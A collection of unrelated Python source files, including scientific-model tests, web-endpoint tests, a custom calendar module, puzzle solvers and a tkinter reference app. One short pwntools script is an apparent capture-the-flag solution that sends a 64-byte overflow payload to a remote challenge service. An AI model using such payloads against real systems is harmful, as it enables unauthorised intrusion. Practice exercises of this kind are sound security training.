        domains = {var: [ch] if ch in '123456789' else '123456789'
                   for var, ch in zip(flatten(self.rows), squares)}
        # Anything left in `squares` means the grid had more than 81 cells.
        for _ in squares:
            raise ValueError("Not a Sudoku grid", grid)  # Too many squares
        CSP.__init__(self, None, domains, self.neighbors, different_values_constraint)
        self.support_pruning()

    def display(self, assignment):
        """Print the 9x9 grid for *assignment*, '.' for unassigned cells."""
        # Render one box as three strings, one per box row.
        def show_box(box): return [' '.join(map(show_cell, row)) for row in box]

        def show_cell(cell): return str(assignment.get(cell, '.'))

        # Join the corresponding rows of three horizontally adjacent boxes.
        def abut(lines1, lines2): return list(
            map(' | '.join, list(zip(lines1, lines2))))
        print('\n------+-------+------\n'.join(
            '\n'.join(reduce(
                abut, map(show_box, brow))) for brow in self.bgrid))
#!/usr/bin/env python
import argparse
import pathlib
# File suffixes considered intermediate compile results.
CLEAN_EXTENSIONS = frozenset({'.c', '.pyc', '.so'})


def clean(root):
    """Recursively delete files under *root* whose suffix is in CLEAN_EXTENSIONS.

    Args:
        root: pathlib.Path of the directory to clean in place.
    """
    for entry in root.iterdir():
        if entry.is_dir():
            clean(entry)
        elif entry.is_file() and entry.suffix in CLEAN_EXTENSIONS:
            entry.unlink()
if __name__ == '__main__':
    # Parse the single positional argument and clean from its resolved root.
    arg_parser = argparse.ArgumentParser(
        description='Recursively clean intermediate compile results.'
    )
    arg_parser.add_argument('directory', help='root directory to operate on')
    namespace = arg_parser.parse_args()
    clean(pathlib.Path(namespace.directory).resolve())
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
"""
Tests for general zero-order proeprty package
"""
import pytest
from idaes.core import (ControlVolume0DBlock,
EnergyBalanceType,
FlowsheetBlock,
MaterialBalanceType,
MaterialFlowBasis)
from idaes.core.util.model_statistics import (degrees_of_freedom,
fixed_variables_set,
activated_constraints_set,
unused_variables_set)
import idaes.core.util.scaling as iscale
from idaes.core.util.exceptions import ConfigurationError
import idaes.logger as idaeslog
from pyomo.environ import (ConcreteModel,
Expression,
Param,
Set,
units as pyunits,
Var)
from pyomo.util.check_units import (assert_units_consistent,
assert_units_equivalent)
from watertap.core import Database, WaterParameterBlock, WaterStateBlock
@pytest.fixture(scope="module")
def model():
    """Module-scope flowsheet with a WaterParameterBlock of solutes A, B, C."""
    m = ConcreteModel()
    m.fs = FlowsheetBlock(default={"dynamic": False})
    m.fs.water_props = WaterParameterBlock(
        default={"solute_list": ["A", "B", "C"]})
    return m
@pytest.mark.unit
def test_parameter_block(model):
    """Check the component/solvent/solute/phase sets and state block class."""
    assert isinstance(model.fs.water_props.component_list, Set)
    for j in model.fs.water_props.component_list:
        assert j in ["H2O", "A", "B", "C"]
    assert isinstance(model.fs.water_props.solvent_set, Set)
    for j in model.fs.water_props.solvent_set:
        assert j in ["H2O"]
    assert isinstance(model.fs.water_props.solute_set, Set)
    for j in model.fs.water_props.solute_set:
        assert j in ["A", "B", "C"]
    assert isinstance(model.fs.water_props.phase_list, Set)
    for j in model.fs.water_props.phase_list:
        assert j in ["Liq"]
    assert model.fs.water_props._state_block_class is WaterStateBlock


@pytest.mark.unit
def test_build_state_block(model):
    """Build an indexed state block and check it shares the parameter sets."""
    model.fs.state = model.fs.water_props.build_state_block([0])
    assert isinstance(model.fs.state, WaterStateBlock)
    assert model.fs.state.component_list is model.fs.water_props.component_list
    assert model.fs.state[0].component_list is \
        model.fs.water_props.component_list
    assert model.fs.state.phase_list is model.fs.water_props.phase_list
    assert model.fs.state[0].phase_list is model.fs.water_props.phase_list
@pytest.mark.unit
def test_state_block_basic_attributes(model):
    """Verify state variables, balance defaults and flow/density terms."""
    assert isinstance(model.fs.state[0].flow_mass_comp, Var)
    # All variables are stale, so DoF should be 0
    assert len(unused_variables_set(model.fs.state[0])) == 4
    assert degrees_of_freedom(model.fs.state[0]) == 0
    for p in model.fs.state[0].phase_list:
        for j in model.fs.state[0].component_list:
            assert (model.fs.state[0].get_material_flow_terms(p, j) is
                    model.fs.state[0].flow_mass_comp[j])
            assert (model.fs.state[0].get_material_density_terms(p, j) is
                    model.fs.state[0].conc_mass_comp[j])
    assert (model.fs.state[0].default_material_balance_type() is
            MaterialBalanceType.componentTotal)
    assert (model.fs.state[0].default_energy_balance_type() is
            EnergyBalanceType.none)
    assert (model.fs.state[0].define_state_vars() == {
        "flow_mass_comp": model.fs.state[0].flow_mass_comp})
    assert (model.fs.state[0].define_display_vars() == {
        "Volumetric Flowrate": model.fs.state[0].flow_vol,
        "Mass Concentration": model.fs.state[0].conc_mass_comp})
    assert (model.fs.state[0].get_material_flow_basis() is
            MaterialFlowBasis.mass)


@pytest.mark.unit
def test_state_block_other_properties(model):
    """Density is a Param; concentration and volumetric flow are Expressions."""
    assert isinstance(model.fs.state[0].dens_mass, Param)
    assert isinstance(model.fs.state[0].conc_mass_comp, Expression)
    assert isinstance(model.fs.state[0].flow_vol, Expression)
@pytest.mark.unit
def test_state_block_scaling(model):
    """Default scaling factors apply, and per-variable overrides are honoured."""
    # Set some new default scaling factors
    model.fs.water_props.default_scaling_factor[("conc_mass_comp", "B")] = 5e-2
    iscale.calculate_scaling_factors(model)
    assert len(model.fs.state[0].scaling_factor) == 9
    assert model.fs.state[0].scaling_factor[model.fs.state[0].flow_vol] == 1e3
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].conc_mass_comp["H2O"]] == 100
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].conc_mass_comp["A"]] == 100
    # "B" picks up the overridden default set above.
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].conc_mass_comp["B"]] == 5e-2
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].conc_mass_comp["C"]] == 100
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].flow_mass_comp["H2O"]] == 1e5
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].flow_mass_comp["A"]] == 1e5
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].flow_mass_comp["B"]] == 1e5
    assert model.fs.state[0].scaling_factor[
        model.fs.state[0].flow_mass_comp["C"]] == 1e5


@pytest.mark.component
def test_unit_consistency(model):
    """Units are internally consistent; flow in m^3/s, concentration in kg/m^3."""
    assert_units_consistent(model)
    for e in model.fs.state[0].flow_vol.values():
        assert_units_equivalent(e, pyunits.m**3/pyunits.s)
    for e in model.fs.state[0].conc_mass_comp.values():
        assert_units_equivalent(e, pyunits.kg/pyunits.m**3)
@pytest.mark.component
def test_initialize_state_block(model):
    """initialize(hold_state=True) fixes only the state vars; release restores."""
    orig_fixed_vars = fixed_variables_set(model)
    orig_act_consts = activated_constraints_set(model)
    flags = model.fs.state.initialize(hold_state=True)
    assert degrees_of_freedom(model) == 0
    inter_fixed_vars = fixed_variables_set(model)
    for v in inter_fixed_vars:
        assert v.name in ['fs.state[0].flow_mass_comp[H2O]',
                          'fs.state[0].flow_mass_comp[A]',
                          'fs.state[0].flow_mass_comp[B]',
                          'fs.state[0].flow_mass_comp[C]']
    model.fs.state.release_state(flags)
    # After release, the fixed-variable and active-constraint sets must be
    # exactly what they were before initialization.
    fin_fixed_vars = fixed_variables_set(model)
    fin_act_consts = activated_constraints_set(model)
    assert len(fin_act_consts) == len(orig_act_consts)
    assert len(fin_fixed_vars) == len(orig_fixed_vars)
    for c in fin_act_consts:
        assert c in orig_act_consts
    for v in fin_fixed_vars:
        assert v in orig_fixed_vars


@pytest.mark.component
def test_CV_integration(model):
    """The property package works inside a 0D control volume."""
    model.fs.cv = ControlVolume0DBlock(default={
        "property_package": model.fs.water_props})
    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_material_balances(has_phase_equilibrium=True)
    # No energy or momentum balances, as these are not supported.
@pytest.mark.unit
def test_no_solute_list_defined():
    """Building the parameter block without a solute_list or database fails."""
    model = ConcreteModel()
    model.fs = FlowsheetBlock(default={"dynamic": False})
    expected = ("water_props no solute_list or database was "
                "defined. Users must provide at least one of these "
                "arguments.")
    with pytest.raises(ConfigurationError, match=expected):
        model.fs.water_props = WaterParameterBlock()
@pytest.mark.component
def test_solute_list_from_database():
    """With only a database given, the solute set must come from it."""
    model = ConcreteModel()
    database = Database()
    model.fs = FlowsheetBlock(default={"dynamic": False})
    model.fs.water_props = WaterParameterBlock(
        default={"database": database})
    assert model.fs.water_props.solute_set == database.get_solute_set()
@pytest.mark.component
def test_solute_list_with_database(caplog):
    """Solutes in solute_list but absent from the database are logged."""
    caplog.set_level(idaeslog.DEBUG, logger="watertap")
    log = idaeslog.getLogger("idaes.watertap.core.zero_order_properties")
    log.setLevel(idaeslog.DEBUG)
    model = ConcreteModel()
    database = Database()
    model.fs = FlowsheetBlock(default={"dynamic": False})
    model.fs.water_props = WaterParameterBlock(
        default={"solute_list": ["A", "B", "tds"], "database": database})

    def missing_msg(component):
        # Exact wording emitted for an unknown component.
        return ("fs.water_props component " + component +
                " is not defined in the water_sources database file.")

    assert missing_msg("A") in caplog.text
    assert missing_msg("B") in caplog.text
    assert missing_msg("tds") not in caplog.text
|
import numpy as np
import yt
import yt_idv

# Spherical Test (to line 20)
# Build a fake uniform-grid dataset in spherical coordinates and render it
# interactively with yt_idv.
NDIM = 32
# Domain bounds per axis: r in [0, 0.5]; theta and phi restricted to
# narrow angular wedges.
bbox = np.array(
    [[0.0, 0.5], [np.pi / 8, 2 * np.pi / 8], [2 * np.pi / 8, 3 * np.pi / 8]]
)
# Random density field only -- values are irrelevant for this render test.
fake_data = {"density": np.random.random((NDIM, NDIM, NDIM))}
ds = yt.load_uniform_grid(
    fake_data, [NDIM, NDIM, NDIM], bbox=bbox, geometry="spherical",
)
rc = yt_idv.render_context(height=800, width=800, gui=True)
dd = ds.all_data()
dd.max_level = 1
# Render the radial coordinate field rather than density.
sg = rc.add_scene(ds, ("index", "r"), no_ghost=True)
sg.camera.focus = [0.0, 0.0, 0.0]
# Blocks until the interactive window is closed.
rc.run()
# Cartesian Test (to line 25)
# ds = yt.load_sample("IsolatedGalaxy")
# rc = yt_idv.render_context(height=800, width=800, gui=True)
# sg = rc.add_scene(ds, "density", no_ghost=True)
# rc.run()
|
class SummaryData:
    """Container pairing a host record with its guests record.

    Both members are expected to expose a ``toDict()`` method, or be None.
    """

    def __init__(self):
        self.host = None
        self.guests = None

    def setHost(self, host):
        """Attach the host record."""
        self.host = host

    def setGuests(self, guests):
        """Attach the guests record."""
        self.guests = guests

    def toDict(self):
        """Serialise to a plain dict; missing members map to None."""
        serialised = {}
        for key in ("host", "guests"):
            member = getattr(self, key)
            serialised[key] = member.toDict() if member is not None else None
        return serialised

    def __str__(self):
        return "SummaryData[hosts={}, guests={}]".format(str(self.host), str(self.guests))
# -*- coding: utf-8 -*-
# `loaddl` for "load data loader"
from .. import data
def load_data_loader(dl_type: str = "BP") -> type:
    """Look up and return the ``<dl_type>DataLoader`` class from ``data``."""
    loader_name = "{}DataLoader".format(dl_type)
    return getattr(data, loader_name)
|
from __future__ import absolute_import
from exam import fixture
from django.conf import settings
from django.core.urlresolvers import reverse
from sentry.testutils import TestCase
class JavaScriptSdkLoaderTest(TestCase):
    """Tests for the ``sentry-js-sdk-loader`` endpoint and CDN URL helper."""

    @fixture
    def path(self):
        """Loader URL for this project's public key; also configures the
        SDK version/URL settings the view reads."""
        settings.JS_SDK_LOADER_SDK_VERSION = '0.5.2'
        settings.JS_SDK_LOADER_DEFAULT_SDK_URL = 'https://s3.amazonaws.com/getsentry-cdn/@sentry/browser/%s/bundle.min.js'
        return reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key])

    def test_noop_no_pub_key(self):
        """An unknown public key serves the no-op loader template."""
        resp = self.client.get(reverse('sentry-js-sdk-loader', args=['abc']))
        assert resp.status_code == 200
        self.assertTemplateUsed(resp, 'sentry/js-sdk-loader-noop.js.tmpl')

    def test_noop(self):
        """Without a configured SDK URL the no-op loader is served."""
        settings.JS_SDK_LOADER_DEFAULT_SDK_URL = ''
        resp = self.client.get(reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key]))
        assert resp.status_code == 200
        self.assertTemplateUsed(resp, 'sentry/js-sdk-loader-noop.js.tmpl')

    def test_no_replace(self):
        """A URL without a version placeholder is passed through verbatim."""
        settings.JS_SDK_LOADER_SDK_VERSION = '0.5.2'
        settings.JS_SDK_LOADER_DEFAULT_SDK_URL = 'https://s3.amazonaws.com/getsentry-cdn/@sentry/browser/0.0.0/bundle.min.js'
        resp = self.client.get(reverse('sentry-js-sdk-loader', args=[self.projectkey.public_key]))
        assert resp.status_code == 200
        self.assertIn(settings.JS_SDK_LOADER_DEFAULT_SDK_URL, resp.content)
        self.assertTemplateUsed(resp, 'sentry/js-sdk-loader.js.tmpl')

    def test_renders_js_loader(self):
        """The loader template embeds the public key and bundle URL."""
        resp = self.client.get(self.path)
        assert resp.status_code == 200
        self.assertTemplateUsed(resp, 'sentry/js-sdk-loader.js.tmpl')
        self.assertIn(self.projectkey.public_key, resp.content)
        self.assertIn('bundle.min.js', resp.content)

    def test_minified(self):
        """The .min variant uses the minified template and is smaller."""
        resp = self.client.get(self.path)
        assert resp.status_code == 200
        min_resp = self.client.get(
            reverse(
                'sentry-js-sdk-loader',
                args=[
                    self.projectkey.public_key,
                    '.min']))
        assert min_resp.status_code == 200
        self.assertTemplateUsed(min_resp, 'sentry/js-sdk-loader.min.js.tmpl')
        self.assertIn(self.projectkey.public_key, min_resp.content)
        self.assertIn('bundle.min.js', min_resp.content)
        assert len(resp.content) > len(min_resp.content)

    def test_headers(self):
        """CORS, caching and surrogate-key headers are set; cookies are not."""
        resp = self.client.get(self.path)
        assert resp.status_code == 200, resp
        self.assertIn('*', resp['Access-Control-Allow-Origin'])
        self.assertIn('stale-if-error', resp['Cache-Control'])
        self.assertIn('stale-while-revalidate', resp['Cache-Control'])
        self.assertIn('s-maxage', resp['Cache-Control'])
        self.assertIn('max-age', resp['Cache-Control'])
        self.assertIn('project/%s' % self.projectkey.project_id, resp['Surrogate-Key'])
        self.assertIn('sdk/%s' % settings.JS_SDK_LOADER_SDK_VERSION, resp['Surrogate-Key'])
        self.assertIn('sdk-loader', resp['Surrogate-Key'])
        assert 'Content-Encoding' not in resp
        assert 'Set-Cookie' not in resp
        assert 'Vary' not in resp

    def test_absolute_url(self):
        """js_sdk_loader_cdn_url uses the CDN base when one is configured."""
        assert reverse(
            'sentry-js-sdk-loader',
            args=[
                self.projectkey.public_key,
                '.min']) in self.projectkey.js_sdk_loader_cdn_url
        settings.JS_SDK_LOADER_CDN_URL = 'https://js.sentry-cdn.com/'
        # BUG FIX: the original formatted the *comparison result* into the
        # URL string ("..." % (a == b)), which yields a non-empty -- hence
        # always truthy -- string, so the assertion could never fail.
        assert ('https://js.sentry-cdn.com/%s.min.js' % self.projectkey.public_key
                == self.projectkey.js_sdk_loader_cdn_url)
|
from pwn import *
# Connect to the remote challenge service; the commented-out line runs the
# local binary instead for offline testing.
io = remote("13.37.111.222", "5000")
#io = process("./challenge_1")
# Fill the 64-byte username field exactly, overflowing into whatever
# follows it in memory.
payload = b""
payload += b"A"*64
io.sendlineafter("username:", payload)
# Hand the connection to the user to read the service's response.
io.interactive()
# FLAG: CN{finding_boundaries_is_never_easy}
|
#coding: latin1
# Enumerate every N-queens solution for board sizes 1..8 using the
# backtracking enumerator.  The "#[full" / "#]full" markers delimit a
# listing excerpt for documentation extraction and must be kept as-is.
from algoritmia.problems.puzzles.nqueens.backtracking1 import NQueensEnumerator#[full
from algoritmia.problems.puzzles.nqueens.backtracking1 import NQueensStateSpace1
solver = NQueensEnumerator()
for n in range(1, 9):
    space = NQueensStateSpace1(n)
    # 's'*(n>1) pluralises "reina" (Spanish for queen) when n > 1.
    print("Soluciones con {} reina{}:".format(n, 's'*(n>1)), end=" ")
    for queens in solver.enumerate(space):
        print(queens, end=" ")
    print() #]full
|
"""Packaging configuration for the ``bloomy`` bloom-filter package."""
import setuptools
# Reuse the PyPI-specific readme as the long description shown on the index.
with open("PYPI.md", "r") as fh:
    long_description = fh.read()
setuptools.setup(
    name="bloomy",
    version="0.0.2",
    author="Sam Crochet",
    author_email="samuel.d.crochet@gmail.com",
    description="An efficient and scalable bloom filter module built in pure python.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/shmam/bloomy",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
from datetime import datetime, timedelta
from typing import Union
class SatDatetime:
    """A point in time in the 'Sat' calendar.

    The epoch is 2017-12-25 (real time) and 7 real days span 20 Sat years.
    A Sat year has 8 months, a month has 22 days, with the ordinary
    24h/60m/60s subdivisions.  Fields are kept normalised via
    refresh_by_year().
    """
    @staticmethod
    def get_from_datetime(date):
        """Convert a real ``datetime.datetime`` into a SatDatetime."""
        delta = date - datetime(2017, 12, 25)
        # Fractional real days since the epoch, rescaled: 7 days -> 20 years.
        convert = (delta.days + (delta.seconds + delta.microseconds / 1000000) / 86400) / 7 * 20
        return SatDatetime(convert)
    def __init__(self,
                 year: float, month: float = 1, day: float = 1,
                 hour: float = 0, minute: float = 0, second: float = 0):
        # Fold all (possibly fractional) components into one fractional year.
        # month and day are 1-based, hence the -1 offsets.
        minute += second / 60
        hour += minute / 60
        day += -1 + hour / 24
        month += -1 + day / 22
        year += month / 8
        # Placeholder values; refresh_by_year() computes the real fields.
        self.year = 1
        self.month = 1
        self.day = 1
        self.hour = 0
        self.minute = 0
        self.second = 0.0
        self.refresh_by_year(year)
    def __copy__(self):
        return SatDatetime(self.year, self.month, self.day, self.hour, self.minute, self.second)
    def __str__(self):
        """ A user-friendly string representation of SatTimedelta. """
        return f'{self.year}. {self.month}. {self.day:02d}. {self.hour:02d}:{self.minute:02d}:{self.second:09.6f}'
    def __repr__(self):
        """ A programmer-friendly string representation of SatTimedelta. """
        return f'SatDatetime({self.year}, {self.month}, {self.day}, {self.hour}, {self.minute}, {self.second})'
    def __add__(self, other: 'SatTimedelta') -> 'SatDatetime':
        """ Adds SatTimedelta object from self and returns new SatTimedelta object. """
        if isinstance(other, SatTimedelta):
            return SatDatetime(self.year + other.years, self.month + other.months, self.day + other.days,
                               self.hour + other.hours, self.minute + other.minutes, self.second + other.seconds)
        else:
            raise TypeError(f'SatDatetime can only be added to SatTimedelta, not {type(other)}')
    def __sub__(self, other: 'SatTimedelta') -> 'SatDatetime':
        """ Subtracts SatTimedelta object from self and returns new SatTimedelta object. """
        if isinstance(other, SatTimedelta):
            return SatDatetime(self.year - other.years, self.month - other.months, self.day - other.days,
                               self.hour - other.hours, self.minute - other.minutes, self.second - other.seconds)
        else:
            raise TypeError(f'SatDatetime can only be subtracted from SatTimedelta, not {type(other)}')
    def __mul__(self, other: float) -> 'SatDatetime':
        """ Multiplies SatTimedelta object by float and returns new SatTimedelta object. """
        return SatDatetime(self.year * other, self.month * other, self.day * other,
                           self.hour * other, self.minute * other, self.second * other)
    def __truediv__(self, other: float) -> 'SatDatetime':
        """ Divides SatTimedelta object by float and returns new SatTimedelta object. """
        return SatDatetime(self.year / other, self.month / other, self.day / other,
                           self.hour / other, self.minute / other, self.second / other)
    def __lt__(self, other: 'SatDatetime') -> bool:
        # Comparisons all reduce to the fractional-year representation.
        return self.get_on_year() < other.get_on_year()
    def __le__(self, other: 'SatDatetime') -> bool:
        return self.get_on_year() <= other.get_on_year()
    def __eq__(self, other: 'SatDatetime') -> bool:
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable (implicit __hash__ = None) -- confirm that's acceptable.
        return self.get_on_year() == other.get_on_year()
    def __ne__(self, other: 'SatDatetime') -> bool:
        return self.get_on_year() != other.get_on_year()
    def __gt__(self, other: 'SatDatetime') -> bool:
        return self.get_on_year() > other.get_on_year()
    def __ge__(self, other: 'SatDatetime') -> bool:
        return self.get_on_year() >= other.get_on_year()
    def refresh_by_year(self, year):
        """Split a fractional year into normalised calendar fields.

        Each step peels off the integer part and scales the remainder into
        the next smaller unit (8 months/year, 22 days/month, 24 h/day, ...).
        month and day are stored 1-based.
        """
        year, month = int(year), (year - int(year)) * 8
        month, day = int(month) + 1, (month - int(month)) * 22
        day, hour = int(day) + 1, (day - int(day)) * 24
        hour, minute = int(hour), (hour - int(hour)) * 60
        minute, second = int(minute), (minute - int(minute)) * 60
        self.year = year
        self.month = month
        self.day = day
        self.hour = hour
        self.minute = minute
        self.second = second
    def get_on_year(self):
        """Inverse of refresh_by_year(): collapse the fields back into a
        single fractional year."""
        minute = self.minute + self.second / 60
        hour = self.hour + minute / 60
        day = self.day - 1 + hour / 24
        month = self.month - 1 + day / 22
        year = self.year + month / 8
        return year
    def to_datetime(self):
        """Convert back to a real ``datetime.datetime`` (20 years -> 7 days)."""
        c = self.get_on_year()
        days_plus = c / 20 * 7
        return datetime(2017, 12, 25) + timedelta(days=days_plus)
class SatTimedelta:
    """A duration in the Sat calendar (1 year = 8 months of 22 days each,
    with ordinary 24h/60m/60s subdivisions).

    Construction normalises the components: whole years, months, days,
    hours and minutes are stored as ints, with any (possibly fractional)
    remainder kept in ``seconds``.
    """
    def __init__(self,
                 years: float = 0, months: float = 0, days: float = 0,
                 hours: float = 0, minutes: float = 0, seconds: float = 0):
        self.years = years
        self.months = months
        self.days = days
        self.hours = hours
        self.minutes = minutes
        self.seconds = seconds
        seconds = self.get_in_seconds()
        # Redistribute the total into normalised components.  BUG FIX: the
        # quotients are now cast to int -- float inputs used to leave float
        # components, making the '{:d}' formats in __str__ raise ValueError
        # (e.g. str(SatTimedelta(seconds=90.5))).  int() on a floored float
        # preserves the original // semantics.
        self.years = int(seconds // 15206400)    # 8 * 22 * 86400 s per year
        seconds -= self.years * 15206400
        self.months = int(seconds // 1900800)    # 22 * 86400 s per month
        seconds -= self.months * 1900800
        self.days = int(seconds // 86400)
        seconds -= self.days * 86400
        self.hours = int(seconds // 3600)
        seconds -= self.hours * 3600
        self.minutes = int(seconds // 60)
        seconds -= self.minutes * 60
        self.seconds = seconds
    def __str__(self):
        """User-friendly form: total days plus hours/minutes/seconds."""
        return f'{self.days + self.months * 22 + self.years * 176:d} days, ' \
               f'{self.hours:d} hours {self.minutes:d} minutes {self.seconds} seconds'
    def __repr__(self):
        return f'SatTimedelta({self.years}, {self.months}, {self.days}, {self.hours}, {self.minutes}, {self.seconds})'
    def __add__(self, other: 'SatTimedelta') -> Union['SatTimedelta', 'SatDatetime']:
        """Add another delta (-> SatTimedelta) or a date (-> SatDatetime)."""
        if isinstance(other, SatTimedelta):
            return SatTimedelta(self.years + other.years, self.months + other.months, self.days + other.days,
                                self.hours + other.hours, self.minutes + other.minutes, self.seconds + other.seconds)
        elif isinstance(other, SatDatetime):
            return SatDatetime(self.years + other.year, self.months + other.month, self.days + other.day,
                               self.hours + other.hour, self.minutes + other.minute, self.seconds + other.second)
        else:
            raise TypeError(f'SatTimedelta can only be added to SatTimedelta or SatDatetime, not {type(other)}')
    def __sub__(self, other: 'SatTimedelta') -> 'SatTimedelta':
        """Subtract another delta."""
        if isinstance(other, SatTimedelta):
            return SatTimedelta(self.years - other.years, self.months - other.months, self.days - other.days,
                                self.hours - other.hours, self.minutes - other.minutes, self.seconds - other.seconds)
        else:
            raise TypeError(f'SatTimedelta can only be subtracted from SatTimedelta, not {type(other)}')
    def __mul__(self, other: float) -> 'SatTimedelta':
        """Scale the delta by a number."""
        return SatTimedelta(self.years * other, self.months * other, self.days * other,
                            self.hours * other, self.minutes * other, self.seconds * other)
    def __truediv__(self, other: float) -> 'SatTimedelta':
        """Divide the delta by a number."""
        return SatTimedelta(self.years / other, self.months / other, self.days / other,
                            self.hours / other, self.minutes / other, self.seconds / other)
    def __floordiv__(self, other: float) -> 'SatTimedelta':
        """Floor-divide each component by a number (result renormalises)."""
        return SatTimedelta(self.years // other, self.months // other, self.days // other,
                            self.hours // other, self.minutes // other, self.seconds // other)
    def get_in_seconds(self):
        """Total duration expressed in seconds."""
        return self.seconds \
               + self.minutes * 60 \
               + self.hours * 3600 \
               + self.days * 86400 \
               + self.months * 1900800 \
               + self.years * 15206400
    def get_in_years(self) -> float:
        """Total duration expressed in Sat years."""
        return self.get_in_seconds() / 15206400
if __name__ == '__main__':
    # No demo/CLI behaviour yet; the module is import-only.
    pass
|
import tkinter as tk
import time
import os
from ctypes import windll
import examples as exs
import tkinter.messagebox
windll.shcore.SetProcessDpiAwareness(1)
class Window:
    """Base wrapper around a Tk root window.

    Keeps registries for menus, widgets, images and keyboard shortcuts,
    applies styles from a loaded style sheet, and drives a fixed-rate
    Loop().  Subclasses customise behaviour by overriding onStart(),
    update() and checkInputs().
    """
    def __init__(self, title, size):
        self.root = tk.Tk()
        # Setting window title
        self.root.title(title)
        #Setting window size
        self.root.geometry("{}x{}".format(size[0], size[1]))
        # Default variable values
        self.style_sheet = {"__none__": {}} # Handles all the widget styling
        self.menus = {} # Stores all the menus (tk Frames)
        self.shortcuts = {} # Stores all the keyboard shortcuts
        self.lastIteration = 0 # Stores the last time the Loop method was called to allow constant frame rate
        self.frame_rate = 15 # Stores frame rate, default = 15 fps
        self.process = True # Stores if window is still open
        self.widgets = {} # Stores the widgets
        self.current_menu = self.addMenu("root") # Creates the default menu
        self.images = {}
        # Change self.process value on window close
        self.root.protocol("WM_DELETE_WINDOW", self.close_handler)
        self.onStart()
    # FUNCTIONS TO BE CREATED BY USER ===>
    def onStart(self):
        """Hook: called once at the end of __init__; override in subclasses."""
        pass
    def update(self):
        """Hook: called every frame from Loop(); override in subclasses."""
        pass
    def checkInputs(self):
        """Hook: called every frame before update(); override in subclasses."""
        pass
    # <===
    # Load all the images in a folder
    def loadImagesFromFolder(self, directory):
        """Register every .png/.jpg/.PNG/.gif file in *directory* as a
        PhotoImage, keyed by file name without its extension."""
        allowed = [".png", ".jpg", ".PNG", ".gif"]
        for filename in os.listdir(directory):
            for suf in allowed:
                if filename.endswith(suf):
                    self.images.update({filename.replace(suf, ""): tk.PhotoImage(file=os.path.join(directory, filename))})
                    break
    # Changes the current menu
    def goToMenu(self, menu):
        """Lower the current menu frame and raise the named one."""
        # self.current_menu.lower()
        tk.Misc.lower(self.current_menu)
        self.current_menu = self.menus[menu]
        # self.current_menu.lift()
        tk.Misc.lift(self.current_menu)
    # Adds a menu to the window
    def addMenu(self, name, autoplace = True, canvas = False, style = "__none__", **kwargs):
        """Create a Frame (or Canvas) menu, styled and registered; optionally
        placed to fill the whole window."""
        arguments = dict(self.style_sheet[style], **kwargs)
        # Check if shoud create canvas or frame
        frame = tk.Frame(self.root, arguments) if not canvas else tk.Canvas(self.root, arguments)
        self.menus.update({name: frame})
        if autoplace:
            frame.place(relx=0, rely=0, relwidth=1, relheight=1)
        return frame
    # Gets called when the user presses the close button
    def close_handler(self):
        """Mark the app as finished and destroy the Tk window."""
        self.process = False
        self.root.destroy()
    # Adds a keyboard shortcut to the app
    def addShortcut(self, keySym, command, widget = False):
        """Bind *command* to key event *keySym* on *widget* (or the root)."""
        binder = widget if widget != False else self.root
        binder.bind(keySym, command)
    # Adds a widget to the window
    def addWidget(self, menu, name, cls, style = "__none__", **kwargs):
        """Instantiate widget class *cls* inside the named menu, merging
        style-sheet options with explicit kwargs, and register it."""
        arguments = dict(self.style_sheet[style], **kwargs)
        widget = cls(self.menus[menu], arguments)
        self.widgets.update({name: widget})
        return widget
    # Retrieves the styling from the stylesheet
    def getStyling(self, style):
        """Return *style* itself if it is already a dict, else look it up."""
        return style if isinstance(style, dict) else self.style_sheet[style]
    # Allows for shorter syntax in the code when placing a widget with a tuple of size and position
    def place(self, name, tup, isMenu = False):
        """Place a registered widget/menu from (relx, rely, relwidth, relheight)."""
        widget = self.widgets[name] if not isMenu else self.menus[name]
        widget.place(relx=tup[0], rely=tup[1], relwidth=tup[2], relheight=tup[3])
    # Load a style sheet for the app
    def addStyleSheet(self, path, separate_tags = False):
        """Load a style sheet file; optionally split out 't__' tag entries."""
        if separate_tags:
            self.style_sheet, self.tags = loadStyleSheet(path, separate_tags)
        else:
            self.style_sheet = loadStyleSheet(path, False)
    def Loop(self):
        """Run one frame: sleep to hold frame_rate, then poll and update."""
        # Get constant frame rate by checking last iteration
        if time.time() - self.lastIteration < 1/self.frame_rate:
            time.sleep(1/self.frame_rate - (time.time() - self.lastIteration))
        self.lastIteration = time.time()
        # Update the window and canvas if there is one
        self.checkInputs()
        self.update()
class CheatSheet(Window):
    """Concrete Window: a browsable tkinter reference with a navigation bar,
    scrollable image-based articles and interactive code examples.

    All pixel coordinates below are hand-tuned to the article images in
    the assets folder.
    """
    def onStart(self):
        """Build the whole UI: styles, images, menus and the three articles."""
        # Setting up the window's properties
        self.root.resizable(False, False)
        self.root.iconbitmap("assets/icons/icon.ico")
        self.addStyleSheet('style.txt', True)
        # Setting up the different categories
        self.categories = ["EVENTS LIST", "WIDGET LIST", "WIDGET\nPROPERTIES"]
        self.loadImagesFromFolder("assets")
        self.loadImagesFromFolder("assets/CodeExamples")
        self.current_article = 0
        exs.setupMaster(self.root)
        # Setting up the different menus
        # Navigation frame
        self.addMenu("nav", False, False, "nav_s")
        self.place("nav", (0.80, 0.15, 0.20, 0.85), True)
        # Adding all the navigation buttons
        for i, category in enumerate(self.categories):
            self.addWidget("nav", "navBtn" + str(i), tk.Button, "navBtn_s", text=category, command=lambda x=i: self.goToArticle(x + 1))
